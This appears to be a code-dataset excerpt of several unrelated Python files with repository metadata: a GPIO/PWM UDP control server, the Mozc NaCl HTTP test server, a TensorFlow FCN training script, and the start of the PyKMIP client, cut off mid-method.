reply = 'true;GPIO_PSS;'+datalist[4]+';'+datalist[5]+';'+datalist[6]+';'
elif datalist[1] == 'Add_GPIO_pwm':
pwmpins = datalist[2].split(',')
for pin in pwmpins:
pwm[pin] = GPIOPWM(int(pin),float(datalist[3]))
pwm[pin].start(int(datalist[4]))
idpwm = conndb.execute("INSERT INTO pwm VALUES (null,?,?,?,1,?,?,?)",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6],datalist[7])).lastrowid
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[8],str(idpwm),"ADDED:DC="+datalist[4]+"%,FR="+datalist[3]+"Hz"))
conndb.commit()
reply= 'true;Add_GPIO_pwm;'
elif datalist[1] == 'Delete_GPIO_pwm':
break_ = int(datalist[2])
conndb.execute("DELETE from pwm where Id=?",(datalist[2],))
conndb.execute("DELETE from historia where Id_Pwm=?",(datalist[2],))
conndb.execute("UPDATE pwm set Edit_time=? where Id in (SELECT Id FROM pwm LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[5],datalist[2],datalist[4]+" DELETED"))
conndb.commit()
pwmpins = datalist[3].split(',')
for pin in pwmpins:
pwm[pin].stop()
pwm.pop(pin)
GPIO.cleanup(int(pin))
reply= 'true;Delete_GPIO_pwm;'
elif datalist[1] == 'Edit_GPIO_pwm':
pwmpins = datalist[3].split(',')
pwmpins2 = datalist[4].split(',')
for pin in pwmpins:
if pin not in pwmpins2:
pwm[pin].stop()
pwm.pop(pin)
GPIO.cleanup(int(pin))
for pin2 in pwmpins2:
if pin2 not in pwmpins:
pwm[pin2] = GPIOPWM(int(pin2),float(datalist[5]))
pwm[pin2].start(int(datalist[6]))
else:
pwm[pin2].ChangeDutyCycle(int(datalist[6]))
pwm[pin2].ChangeFrequency(float(datalist[5]))
conndb.execute("UPDATE pwm set GPIO_BCM=?, FR=?, DC=?, SS=1, Name=?, Reverse=?, Edit_time=? where Id=?",(datalist[4],datalist[5],datalist[6],datalist[7],datalist[8],datalist[9],datalist[2]))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[10],datalist[2],"EDITED:DC="+datalist[6]+"%,FR="+datalist[5]+"Hz"))
conndb.commit()
reply= 'true;Edit_GPIO_pwm;'
elif datalist[1] == 'Allpins_GPIO_pwm':
reply = 'true;Allpins_GPIO_pwm;'
cursor15 = conndb.execute("SELECT GPIO_BCM from pwm")
for row in cursor15:
pins = row[0].split(',')
for pin in pins:
reply+= pin+';'
elif datalist[1] == 'Allpins_GPIO_out':
reply = 'true;Allpins_GPIO_out;'
cursor16 = conndb.execute("SELECT GPIO_BCM from stany where IN_OUT like 'out'")
for row in cursor16:
pins = row[0].split(',')
for pin in pins:
reply+= pin+';'
elif datalist[1] == 'Allpins_GPIO_in':
reply = 'true;Allpins_GPIO_in;'
cursor17 = conndb.execute("SELECT GPIO_BCM from stany where IN_OUT like 'in'")
for row in cursor17:
reply+= str(row[0])+';'
elif datalist[1] == 'GPIO_SAEtime':
cursor18 = conndb.execute("SELECT Max(Edit_time) FROM planowanie")
for row in cursor18:
reply = 'true;GPIO_SAEtime;'+str(row[0])+';'
elif datalist[1] == 'GPIO_SAlist':
cursor19 = conndb.execute("SELECT * from planowanie p join stany s on p.Out_id = s.Id")
reply = 'true;GPIO_SAlist;'
for row in cursor19:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[4])+';'+str(row[6])+';'+str(row[11])+';'+str(row[14])+';'
elif datalist[1] == 'GPIO_set':
GPIOset(datalist[3],datalist[4])
reply = 'true;GPIO_set;'+datalist[4]+';'+datalist[5]+';'
gpiolist = datalist[3].split(",")
for gpio in gpiolist:
r1 = conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=? and IN_OUT like 'out') or (GPIO_BCM like ? and Id!=? and IN_OUT like 'out');",(datalist[5],"%"+gpio+",%",datalist[2],"%,"+gpio+"%",datalist[2])).rowcount
r2 = conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? and IN_OUT like 'out' ;",(datalist[4],datalist[5],gpio,datalist[2])).rowcount
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(datalist[4],datalist[5],datalist[2]))
stan = int(datalist[4])
reverse = int(datalist[6])
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[7],datalist[2],"ON" if ((stan and not reverse) or (not stan and reverse)) else "OFF"))
if r1 > 0 or r2 > 0:
reply = 'true;GPIO_set;'+datalist[4]+';2000-01-01 00:00:00.000;'
conndb.commit()
elif datalist[1] == 'GPIO_state':
reply = 'true;GPIO_state;'+str(datalist[2])+';'+str(GPIOstate(datalist[2]))+';'
elif datalist[1] == 'Insert_Action':
conndb.execute("INSERT INTO planowanie(Warunek, Podwarunek, Rodzaj, Dane, Out_id, Stan, Edit_time) VALUES(?,?,?,?,?,?,?)",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6],datalist[7],datalist[8]))
conndb.commit()
reply= 'true;Insert_Action;'
elif datalist[1] == 'Update_Action':
conndb.execute("UPDATE planowanie set Warunek=?, Podwarunek=?, Rodzaj=?, Dane=?, Out_id=?, Stan=?, Edit_time=? where Id=?",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6],datalist[7],datalist[9],datalist[8]))
conndb.commit()
reply= 'true;Update_Action;'
elif datalist[1] == 'Delete_Action':
conndb.execute("DELETE from planowanie where Id=?",(datalist[2],))
conndb.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb.commit()
reply= 'true;Delete_Action;'
elif datalist[1] == 'HR_count':
cursor6 = conndb.execute("SELECT COUNT(*) FROM historia where Czas between ? and ?",(datalist[2],datalist[3]))
for row in cursor6:
reply = 'true;HR_count;'+str(row[0])+';'
elif datalist[1] == 'HR_sel':
cursor5 = conndb.execute("SELECT h.Id,Czas,Typ,case when s.Name is NULL then p.Name else s.Name end as 'Name',h.Stan FROM historia h Left JOIN stany s ON s.Id = h.Id_IO left JOIN pwm p ON p.Id = h.Id_Pwm where Czas between ? and ? order by Czas DESC",(datalist[2],datalist[3]))
reply = 'true;HR_sel;'+datalist[4]+";"
for row in cursor5:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[4])+';'
else:
reply = 'false;Conection OK, but no compabile method found, probably encryption error;'
else:
reply = 'false;Wrong password !;'
if PASSWORD != '' and passwalidation == True :
reply = '1;'+encrypt(ENC_KEY,reply)+';'
s.sendto(reply , addr)
print 'Message[' + addr[0] + ':' + str(addr[1]) + '] - ' + data
print reply
except KeyboardInterrupt:
print "...Ending..."
exitapp = True
s.close()
conndb.close()
GPIO.cleanup()
sys.exit()
| mit | 7,529,238,602,961,676,000 | 57.794721 | 297 | 0.504314 | false |
kishikawakatsumi/Mozc-for-iOS | src/chrome/nacl/nacl_net_test_server.py | 1 | 10698 | # -*- coding: utf-8 -*-
# Copyright 2010-2014, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A utility tool to run NaCl Pepper HTTPClient test.
Example usage:
The following command starts an HTTP server, launches Chrome with the
extension, and opens test.html. When '/TEST_FIN?result=success' is accessed
from the page or the extension, this command exits successfully.
When '/TEST_FIN?result=SOME_ERROR' is accessed, it exits showing SOME_ERROR.
When the specified timeout has expired, it exits showing a timeout error.
python nacl_net_test_server.py --browser_path=/usr/bin/google-chrome \
--serving_dir=/PATH/TO/FILE_DIR \
--serving_dir=/PATH/TO/ADDITIONAL_FILE_DIR \
--load_extension=/PATH/TO/EXTENSION_DIR \
--url=test.html \
--timeout=20
"""
import BaseHTTPServer
import optparse
import os
import os.path
import shutil
import SocketServer
import subprocess
import sys
import tempfile
import thread
import time
import urlparse
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handle the HTTP requests that arrive at the server."""
def do_GET(self):
# pylint: disable=g-bad-name
"""Handles GET request."""
parsed_path = urlparse.urlparse(self.path)
options = {'response': 200,
'result': '',
'before_response_sleep': 0.0,
'before_head_sleep': 0.0,
'after_head_sleep': 0.0,
'before_data_sleep': 0.0,
'after_data_sleep': 0.0,
'content_length': '',
'data': 'DEFAULT_DATA',
'times': 1,
'redirect_location': ''}
query = urlparse.parse_qsl(parsed_path.query)
for params in query:
options[params[0]] = params[1]
if parsed_path.path.startswith('/TEST_FIN'):
if 'result' in options:
if options['result'] == 'success':
self.server.result = 0
else:
self.server.result = options['result']
self.server.finished = True
return
# For retry test.
if parsed_path.path.startswith('/RETRY_TEST'):
if 'action' in options:
self.send_response(200)
self.end_headers()
if options['action'] == 'set_counter':
self.wfile.write('OK')
self.server.retry_test_counter = int(options['value'])
elif options['action'] == 'get_counter':
self.wfile.write(str(self.server.retry_test_counter))
return
else:
self.server.retry_test_counter += 1
if self.server.retry_test_counter <= 0:
self.send_response(404)
self.end_headers()
self.wfile.write('NG')
return
for extra_dir in self.server.serving_dirs:
full_path = os.path.join(extra_dir, os.path.basename(parsed_path.path))
if os.path.isfile(full_path):
try:
data = open(full_path).read()
self.send_response(200)
self.send_header('Content-Length', len(data))
self.end_headers()
self.wfile.write(data)
except IOError, (errno, strerror):
print 'I/O error(%s): %s' % (errno, strerror)
return
try:
time.sleep(float(options['before_response_sleep']))
self.send_response(int(options['response']))
time.sleep(float(options['before_head_sleep']))
self.send_header('command', '%s' % self.command)
self.send_header('path', '%s' % self.path)
self.send_header('parsed_path', '%s' % parsed_path.path)
for name, value in sorted(self.headers.items()):
self.send_header('CLIENT_HEADER_%s' % name, '%s' % value)
if options['content_length']:
self.send_header('Content-Length',
options['content_length'])
if options['redirect_location']:
self.send_header('Location',
options['redirect_location'])
self.end_headers()
time.sleep(float(options['after_head_sleep']))
for _ in range(int(options['times'])):
time.sleep(float(options['before_data_sleep']))
self.wfile.write(options['data'])
time.sleep(float(options['after_data_sleep']))
except IOError, (errno, strerror):
print 'I/O error(%s): %s' % (errno, strerror)
return
def do_POST(self):
# pylint: disable=g-bad-name
"""Handles POST request."""
parsed_path = urlparse.urlparse(self.path)
options = {'response': 200,
'result': '',
'before_response_sleep': 0.0,
'before_head_sleep': 0.0,
'after_head_sleep': 0.0,
'after_data_sleep': 0.0,
'content_length': '',
'redirect_location': ''}
query = urlparse.parse_qsl(parsed_path.query)
for params in query:
options[params[0]] = params[1]
try:
content_len = int(self.headers.getheader('content-length'))
post_data = self.rfile.read(content_len)
time.sleep(float(options['before_response_sleep']))
self.send_response(int(options['response']))
time.sleep(float(options['before_head_sleep']))
self.send_header('command', '%s' % self.command)
self.send_header('path', '%s' % self.path)
self.send_header('parsed_path', '%s' % parsed_path.path)
for name, value in sorted(self.headers.items()):
self.send_header('CLIENT_HEADER_%s' % name, '%s' % value)
if options['content_length']:
self.send_header('Content-Length',
options['content_length'])
if options['redirect_location']:
self.send_header('Location',
options['redirect_location'])
self.end_headers()
time.sleep(float(options['after_head_sleep']))
self.wfile.write(post_data)
time.sleep(float(options['after_data_sleep']))
return
except IOError, (errno, strerror):
print 'I/O error(%s): %s' % (errno, strerror)
return
def do_HEAD(self):
# pylint: disable=g-bad-name
"""Handles HEAD request."""
parsed_path = urlparse.urlparse(self.path)
options = {'response': 200,
'before_response_sleep': 0.0,
'before_head_sleep': 0.0}
query = urlparse.parse_qsl(parsed_path.query)
for params in query:
options[params[0]] = params[1]
try:
time.sleep(float(options['before_response_sleep']))
      self.send_response(int(options['response']))
time.sleep(float(options['before_head_sleep']))
self.send_header('command', '%s' % self.command)
self.send_header('path', '%s' % self.path)
self.send_header('parsed_path', '%s' % parsed_path.path)
for name, value in sorted(self.headers.items()):
self.send_header('CLIENT_HEADER_%s' % name, '%s' % value)
self.end_headers()
except IOError, (errno, strerror):
print 'I/O error(%s): %s' % (errno, strerror)
return
class TestServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def Configure(self, serving_dirs):
self.serving_dirs = serving_dirs
self.finished = False
self.result = 'Not Finished.'
self.retry_test_counter = 0
def main():
parser = optparse.OptionParser(usage='Usage: %prog [options]')
parser.add_option('--timeout', dest='timeout', action='store', type='float',
default=5.0, help='Timeout in seconds.')
parser.add_option('--browser_path', dest='browser_path', action='store',
type='string', default='/usr/bin/google-chrome',
help='The browser path.')
parser.add_option('--serving_dir', dest='serving_dirs', action='append',
type='string', default=[],
help='File directory to be served by HTTP server.')
parser.add_option('--load_extension', dest='load_extension', action='store',
type='string', default='', help='The extension path.')
parser.add_option('-u', '--url', dest='url', action='store',
type='string', default=None, help='The webpage to load.')
(options, _) = parser.parse_args()
# TODO(horo) Don't use the fixed port number. Find the way to pass the port
# number to the test module.
server = TestServer(('localhost', 9999), RequestHandler)
server.Configure(options.serving_dirs)
host, port = server.socket.getsockname()
print 'Starting server %s:%s' % (host, port)
def Serve():
while not server.finished:
server.handle_request()
thread.start_new_thread(Serve, ())
temp_dir = tempfile.mkdtemp()
if options.browser_path:
cmd = [options.browser_path, '--user-data-dir=%s' % temp_dir]
if options.load_extension:
cmd.append('--load-extension=%s' % options.load_extension)
if options.url:
cmd.append('http://%s:%s/%s' % (host, port, options.url))
print cmd
browser_handle = subprocess.Popen(cmd)
time_started = time.time()
result = 0
while True:
if time.time() - time_started >= options.timeout:
result = 'Timeout!: %s' % (time.time() - time_started)
break
if server.finished:
result = server.result
break
time.sleep(0.5)
if options.browser_path:
browser_handle.kill()
browser_handle.wait()
shutil.rmtree(temp_dir)
sys.exit(result)
if __name__ == '__main__':
main()
| apache-2.0 | -5,313,848,604,028,210,000 | 36.93617 | 79 | 0.631053 | false |
aaalgo/picpac | examples/tensorflow/fcn.py | 1 | 6379 | #!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
import picpac
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')
flags.DEFINE_integer('max_steps', 200000, 'Number of steps to run trainer.')
flags.DEFINE_integer('channels', 3, '')
flags.DEFINE_integer('out_channels', 2, '')
flags.DEFINE_string('train_dir', 'data', 'Directory to put the training data.')
flags.DEFINE_boolean('fake_data', False, 'If true, uses fake data '
'for unit testing.')
def cp_layer (bottom, scope, params, ksize, kstride, psize, pstride, ch_in, ch_out, relu=True):
with tf.name_scope(scope):
filters = tf.Variable(
tf.truncated_normal(
[ksize, ksize, ch_in, ch_out],
dtype=tf.float32,
stddev=0.01),
name='filters')
out = tf.nn.conv2d(bottom, filters, [1,kstride,kstride,1], padding="SAME")
biases = tf.Variable(
tf.constant(0.0, shape=[ch_out], dtype=tf.float32),
trainable=True,
name='bias')
out = tf.nn.bias_add(out, biases)
if relu:
out = tf.nn.relu(out, name=scope)
if not psize is None:
out = tf.nn.max_pool(out, ksize=[1,psize,psize,1],
strides=[1,pstride,pstride,1],
padding='SAME',
name='pool')
params.extend([filters, biases])
return out
pass
def inference (images, train=True):
params = []
out = cp_layer(images, "layer1", params, 5, 2, 2, 2, FLAGS.channels, 100)
out = cp_layer(out, "layer2", params, 5, 2, 2, 2, 100, 200)
out = cp_layer(out, "layer2", params, 3, 1, None, None, 200, 300)
out = cp_layer(out, "layer3", params, 3, 1, None, None, 300, 300)
if train:
out = tf.nn.dropout(out, 0.1, name='dropout')
out = cp_layer(out, "score", params, 1, 1, None, None, 300, FLAGS.out_channels, relu=False)
score = out
with tf.name_scope('upscale'):
shape = tf.unpack(tf.shape(images))
print(shape.__class__)
shape.pop()
shape.append(tf.constant(FLAGS.out_channels, dtype=tf.int32))
print(len(shape))
filters = tf.Variable(
tf.truncated_normal(
[31, 31, FLAGS.out_channels, FLAGS.out_channels],
dtype=tf.float32,
stddev=0.01),
name='filters')
logits = tf.nn.conv2d_transpose(out, filters, tf.pack(shape),
[1,16,16,1], padding='SAME', name='upscale')
# do we want to add bias?
return logits, score, params
def fcn_loss (logits, labels):
with tf.name_scope('loss'):
logits = tf.reshape(logits, (-1, FLAGS.out_channels))
labels = tf.to_int32(labels) # float from picpac
labels = tf.reshape(labels, (-1,))
xe = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels, name='xentropy')
return tf.reduce_mean(xe, name='xentropy_mean')
pass
def training (loss, rate):
tf.scalar_summary(loss.op.name, loss)
optimizer = tf.train.GradientDescentOptimizer(rate)
global_step = tf.Variable(0, name='global_step', trainable=False)
return optimizer.minimize(loss, global_step=global_step)
def run_training ():
seed = 1996
config = dict(seed=seed,
loop=True,
shuffle=True,
reshuffle=True,
#resize_width=256,
#resize_height=256,
batch=1,
split=1,
split_fold=0,
annotate='json',
channels=FLAGS.channels,
stratify=False,
#mixin="db0",
#mixin_group_delta=0,
#pert_color1=10,
#pert_angle=5,
#pert_min_scale=0.8,
#pert_max_scale=1.2,
#pad=False,
#pert_hflip=True,
channel_first=False # this is tensorflow specific
# Caffe's dimension order is different.
)
db='db'
tr_stream = picpac.ImageStream(db, negate=False, perturb=True, **config)
with tf.Graph().as_default():
        BATCH = 1  # batch size; must match the picpac 'batch' setting in the config above
        X = tf.placeholder(tf.float32, shape=(BATCH, None, None, FLAGS.channels), name="images")
        Y_ = tf.placeholder(tf.int32, shape=(BATCH, None, None, 1), name="labels")
logits, score, params = inference(X)
loss = fcn_loss(logits, Y_)
train_op = training(loss, FLAGS.learning_rate)
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(FLAGS.train_dir, tf.get_default_graph())
init = tf.initialize_all_variables()
graph_txt = tf.get_default_graph().as_graph_def().SerializeToString()
with open(os.path.join(FLAGS.train_dir, "graph"), "w") as f:
f.write(graph_txt)
pass
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(init)
for step in xrange(FLAGS.max_steps):
images, labels, pad = tr_stream.next()
#print(images.shape, labels.shape)
feed_dict = {X: images,
Y_: labels}
#l_v, s_v = sess.run([logits, score], feed_dict=feed_dict)
#print(images.shape, s_v.shape, l_v.shape)
_, loss_value = sess.run([train_op, loss], feed_dict=feed_dict)
if step % 100 == 0:
print('step %d: loss = %.4f' % (step, loss_value))
summary_str = sess.run(summary_op, feed_dict=feed_dict)
summary_writer.add_summary(summary_str, step)
summary_writer.flush()
if (step + 1) % 1000 == 0 or (step + 1) == FLAGS.max_steps:
saver.save(sess, os.path.join(FLAGS.train_dir, "model"), global_step=step)
pass
pass
pass
pass
def main (_):
run_training()
if __name__ == '__main__':
tf.app.run()
| bsd-2-clause | 740,049,538,521,144,300 | 38.621118 | 96 | 0.532685 | false |
OpenKMIP/PyKMIP | kmip/services/kmip_client.py | 1 | 74179 | # Copyright (c) 2014 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
from kmip.services.results import ActivateResult
from kmip.services.results import CreateResult
from kmip.services.results import CreateKeyPairResult
from kmip.services.results import DestroyResult
from kmip.services.results import DiscoverVersionsResult
from kmip.services.results import GetResult
from kmip.services.results import GetAttributesResult
from kmip.services.results import GetAttributeListResult
from kmip.services.results import LocateResult
from kmip.services.results import OperationResult
from kmip.services.results import QueryResult
from kmip.services.results import RegisterResult
from kmip.services.results import RekeyKeyPairResult
from kmip.services.results import RevokeResult
from kmip.services.results import MACResult
from kmip.core import attributes as attr
from kmip.core import enums
from kmip.core.enums import AuthenticationSuite
from kmip.core.enums import ConformanceClause
from kmip.core.enums import CredentialType
from kmip.core.enums import Operation as OperationEnum
from kmip.core import exceptions
from kmip.core.factories.credentials import CredentialFactory
from kmip.core import objects
from kmip.core import primitives
from kmip.core.messages.contents import Authentication
from kmip.core.messages.contents import BatchCount
from kmip.core.messages.contents import Operation
from kmip.core.messages.contents import ProtocolVersion
from kmip.core.messages import messages
from kmip.core.messages import payloads
from kmip.services.kmip_protocol import KMIPProtocol
from kmip.core.config_helper import ConfigHelper
from kmip.core.utils import BytearrayStream
import logging
import logging.config
import os
import six
import socket
import ssl
import sys
FILE_PATH = os.path.dirname(os.path.abspath(__file__))
CONFIG_FILE = os.path.normpath(os.path.join(FILE_PATH, '../kmipconfig.ini'))
class KMIPProxy(object):
def __init__(self, host=None, port=None, keyfile=None,
certfile=None,
cert_reqs=None, ssl_version=None, ca_certs=None,
do_handshake_on_connect=None,
suppress_ragged_eofs=None,
username=None, password=None, timeout=30, config='client',
config_file=None,
kmip_version=None):
self.logger = logging.getLogger(__name__)
self.credential_factory = CredentialFactory()
self.config = config
# Even partially-initialized objects need to be garbage collected, so
# make sure we have a socket attr before we go raising ValueErrors.
# Otherwise, we can hit AttributeErrors when __del__ is called.
self.socket = None
self._kmip_version = None
if kmip_version:
self.kmip_version = kmip_version
else:
self.kmip_version = enums.KMIPVersion.KMIP_1_2
if config_file:
if not isinstance(config_file, six.string_types):
raise ValueError(
"The client configuration file argument must be a string."
)
if not os.path.exists(config_file):
raise ValueError(
"The client configuration file '{}' does not "
"exist.".format(config_file)
)
self._set_variables(host, port, keyfile, certfile,
cert_reqs, ssl_version, ca_certs,
do_handshake_on_connect, suppress_ragged_eofs,
username, password, timeout, config_file)
self.batch_items = []
self.conformance_clauses = [
ConformanceClause.DISCOVER_VERSIONS]
self.authentication_suites = [
AuthenticationSuite.BASIC,
AuthenticationSuite.TLS12]
@property
def kmip_version(self):
"""
Get the KMIP version for the client.
Return:
kmip_version (KMIPVersion): The KMIPVersion enumeration used by
the client for KMIP requests.
"""
return self._kmip_version
@kmip_version.setter
def kmip_version(self, value):
"""
Set the KMIP version for the client.
Args:
value (KMIPVersion): A KMIPVersion enumeration
Return:
None
Raises:
ValueError: if value is not a KMIPVersion enumeration
Example:
>>> client.kmip_version = enums.KMIPVersion.KMIP_1_1
>>>
"""
if isinstance(value, enums.KMIPVersion):
self._kmip_version = value
else:
raise ValueError("KMIP version must be a KMIPVersion enumeration")
def get_supported_conformance_clauses(self):
"""
Get the list of conformance clauses supported by the client.
Returns:
list: A shallow copy of the list of supported conformance clauses.
Example:
>>> client.get_supported_conformance_clauses()
[<ConformanceClause.DISCOVER_VERSIONS: 1>]
"""
return self.conformance_clauses[:]
def get_supported_authentication_suites(self):
"""
Get the list of authentication suites supported by the client.
Returns:
list: A shallow copy of the list of supported authentication
suites.
Example:
>>> client.get_supported_authentication_suites()
[<AuthenticationSuite.BASIC: 1>, <AuthenticationSuite.TLS12: 2>]
"""
return self.authentication_suites[:]
def is_conformance_clause_supported(self, conformance_clause):
"""
Check if a ConformanceClause is supported by the client.
Args:
conformance_clause (ConformanceClause): A ConformanceClause
enumeration to check against the list of supported
ConformanceClauses.
Returns:
bool: True if the ConformanceClause is supported, False otherwise.
Example:
>>> clause = ConformanceClause.DISCOVER_VERSIONS
>>> client.is_conformance_clause_supported(clause)
True
>>> clause = ConformanceClause.BASELINE
>>> client.is_conformance_clause_supported(clause)
False
"""
return conformance_clause in self.conformance_clauses
def is_authentication_suite_supported(self, authentication_suite):
"""
Check if an AuthenticationSuite is supported by the client.
Args:
authentication_suite (AuthenticationSuite): An AuthenticationSuite
enumeration to check against the list of supported
AuthenticationSuites.
Returns:
bool: True if the AuthenticationSuite is supported, False
otherwise.
Example:
>>> suite = AuthenticationSuite.BASIC
>>> client.is_authentication_suite_supported(suite)
True
>>> suite = AuthenticationSuite.TLS12
>>> client.is_authentication_suite_supported(suite)
False
"""
return authentication_suite in self.authentication_suites
def is_profile_supported(self, conformance_clause, authentication_suite):
"""
Check if a profile is supported by the client.
Args:
conformance_clause (ConformanceClause):
authentication_suite (AuthenticationSuite):
Returns:
bool: True if the profile is supported, False otherwise.
Example:
>>> client.is_profile_supported(
... ConformanceClause.DISCOVER_VERSIONS,
... AuthenticationSuite.BASIC)
True
"""
return (self.is_conformance_clause_supported(conformance_clause) and
self.is_authentication_suite_supported(authentication_suite))
def open(self):
self.logger.debug("KMIPProxy keyfile: {0}".format(self.keyfile))
self.logger.debug("KMIPProxy certfile: {0}".format(self.certfile))
self.logger.debug(
"KMIPProxy cert_reqs: {0} (CERT_REQUIRED: {1})".format(
self.cert_reqs, ssl.CERT_REQUIRED))
self.logger.debug(
"KMIPProxy ssl_version: {0} (PROTOCOL_SSLv23: {1})".format(
self.ssl_version, ssl.PROTOCOL_SSLv23))
self.logger.debug("KMIPProxy ca_certs: {0}".format(self.ca_certs))
self.logger.debug("KMIPProxy do_handshake_on_connect: {0}".format(
self.do_handshake_on_connect))
self.logger.debug("KMIPProxy suppress_ragged_eofs: {0}".format(
self.suppress_ragged_eofs))
last_error = None
for host in self.host_list:
self.host = host
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._create_socket(sock)
self.protocol = KMIPProtocol(self.socket)
try:
self.socket.connect((self.host, self.port))
except Exception as e:
self.logger.error("An error occurred while connecting to "
"appliance %s: %s", self.host, e)
self.socket.close()
last_error = sys.exc_info()
else:
return
self.socket = None
if last_error:
six.reraise(*last_error)
def _create_socket(self, sock):
self.socket = ssl.wrap_socket(
sock,
keyfile=self.keyfile,
certfile=self.certfile,
cert_reqs=self.cert_reqs,
ssl_version=self.ssl_version,
ca_certs=self.ca_certs,
do_handshake_on_connect=self.do_handshake_on_connect,
suppress_ragged_eofs=self.suppress_ragged_eofs)
self.socket.settimeout(self.timeout)
def __del__(self):
# Close the socket properly, helpful in case close() is not called.
self.close()
def close(self):
# Shutdown and close the socket.
if self.socket:
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
except (OSError, socket.error):
# Can be thrown if the socket is not actually connected to
# anything. In this case, ignore the error.
pass
self.socket = None
def send_request_payload(self, operation, payload, credential=None):
"""
Send a KMIP request.
Args:
operation (enum): An Operation enumeration specifying the type
of operation to be requested. Required.
payload (struct): A RequestPayload structure containing the
parameters for a specific KMIP operation. Required.
credential (struct): A Credential structure containing
authentication information for the server. Optional, defaults
to None.
Returns:
response (struct): A ResponsePayload structure containing the
results of the KMIP operation specified in the request.
Raises:
TypeError: if the payload is not a RequestPayload instance or if
the operation and payload type do not match
InvalidMessage: if the response message does not have the right
number of response payloads, or does not match the request
operation
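        Example:
            Illustrative sketch only; assumes ``payload`` is a pre-built
            payloads.DeleteAttributeRequestPayload for an existing managed
            object:
            >>> response = client.send_request_payload(
            ...     enums.Operation.DELETE_ATTRIBUTE,
            ...     payload)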
"""
if not isinstance(payload, payloads.RequestPayload):
raise TypeError(
"The request payload must be a RequestPayload object."
)
# TODO (peterhamilton) For now limit this to the new Delete/Set/Modify
# Attribute operations. Migrate over existing operations to use
# this method instead.
if operation == enums.Operation.DELETE_ATTRIBUTE:
if not isinstance(payload, payloads.DeleteAttributeRequestPayload):
raise TypeError(
"The request payload for the DeleteAttribute operation "
"must be a DeleteAttributeRequestPayload object."
)
elif operation == enums.Operation.SET_ATTRIBUTE:
if not isinstance(payload, payloads.SetAttributeRequestPayload):
raise TypeError(
"The request payload for the SetAttribute operation must "
"be a SetAttributeRequestPayload object."
)
elif operation == enums.Operation.MODIFY_ATTRIBUTE:
if not isinstance(payload, payloads.ModifyAttributeRequestPayload):
raise TypeError(
"The request payload for the ModifyAttribute operation "
"must be a ModifyAttributeRequestPayload object."
)
batch_item = messages.RequestBatchItem(
operation=primitives.Enumeration(
enums.Operation,
operation,
tag=enums.Tags.OPERATION
),
request_payload=payload
)
request_message = self._build_request_message(credential, [batch_item])
response_message = self._send_and_receive_message(request_message)
if len(response_message.batch_items) != 1:
raise exceptions.InvalidMessage(
"The response message does not have the right number of "
"requested operation results."
)
batch_item = response_message.batch_items[0]
if batch_item.result_status.value != enums.ResultStatus.SUCCESS:
raise exceptions.OperationFailure(
batch_item.result_status.value,
batch_item.result_reason.value,
batch_item.result_message.value
)
if batch_item.operation.value != operation:
raise exceptions.InvalidMessage(
